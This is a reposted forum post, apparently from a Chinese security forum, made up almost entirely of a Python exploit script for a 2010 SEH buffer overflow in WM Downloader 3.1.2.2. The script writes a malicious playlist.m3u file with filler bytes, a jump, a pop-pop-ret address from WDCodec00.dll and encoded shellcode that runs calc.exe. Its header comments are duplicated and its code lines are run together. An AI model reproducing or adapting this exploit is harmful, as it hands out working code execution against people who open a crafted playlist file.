-
-
[转帖]WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
-
发表于: 2010-7-29 11:59 3292
-
#!/usr/bin/python
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: fdisk
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en
# Exploit Title: WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow (SEH)
# Date: 2010-07-28
# Author: fdisk
# Version: 3.1.2.2 2010.04.15
# Tested on Windows XP SP3 en
payload = "\x41" * 43485 payload += "\xeb\x16\x90\x90" # jump payload += "\xb4\x15\xbb\x01" # ppr - WDCodec00.dll payload += "\x90" * 16 # windows/exec - 227 bytes x86/shikata_ga_nai EXITFUNC=thread, CMD=calc.exe payload += ("\xdb\xdf\xd9\x74\x24\xf4\x58\x2b\xc9\xb1\x33\xba\x4c\xa8\x75" "\x76\x83\xc0\x04\x31\x50\x13\x03\x1c\xbb\x97\x83\x60\x53\xde" "\x6c\x98\xa4\x81\xe5\x7d\x95\x93\x92\xf6\x84\x23\xd0\x5a\x25" "\xcf\xb4\x4e\xbe\xbd\x10\x61\x77\x0b\x47\x4c\x88\xbd\x47\x02" "\x4a\xdf\x3b\x58\x9f\x3f\x05\x93\xd2\x3e\x42\xc9\x1d\x12\x1b" "\x86\x8c\x83\x28\xda\x0c\xa5\xfe\x51\x2c\xdd\x7b\xa5\xd9\x57" "\x85\xf5\x72\xe3\xcd\xed\xf9\xab\xed\x0c\x2d\xa8\xd2\x47\x5a" "\x1b\xa0\x56\x8a\x55\x49\x69\xf2\x3a\x74\x46\xff\x43\xb0\x60" "\xe0\x31\xca\x93\x9d\x41\x09\xee\x79\xc7\x8c\x48\x09\x7f\x75" "\x69\xde\xe6\xfe\x65\xab\x6d\x58\x69\x2a\xa1\xd2\x95\xa7\x44" "\x35\x1c\xf3\x62\x91\x45\xa7\x0b\x80\x23\x06\x33\xd2\x8b\xf7" "\x91\x98\x39\xe3\xa0\xc2\x57\xf2\x21\x79\x1e\xf4\x39\x82\x30" "\x9d\x08\x09\xdf\xda\x94\xd8\xa4\x05\x77\xc9\xd0\xad\x2e\x98" "\x59\xb0\xd0\x76\x9d\xcd\x52\x73\x5d\x2a\x4a\xf6\x58\x76\xcc" "\xea\x10\xe7\xb9\x0c\x87\x08\xe8\x6e\x46\x9b\x70\x5f\xed\x1b" "\x12\x9f") payload += "\x90" * 16 file = open("playlist.m3u", "w") file.write(payload) file.close() print "m3u file generated successfuly"
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
赞赏
他的文章
看原图
赞赏
雪币:
留言: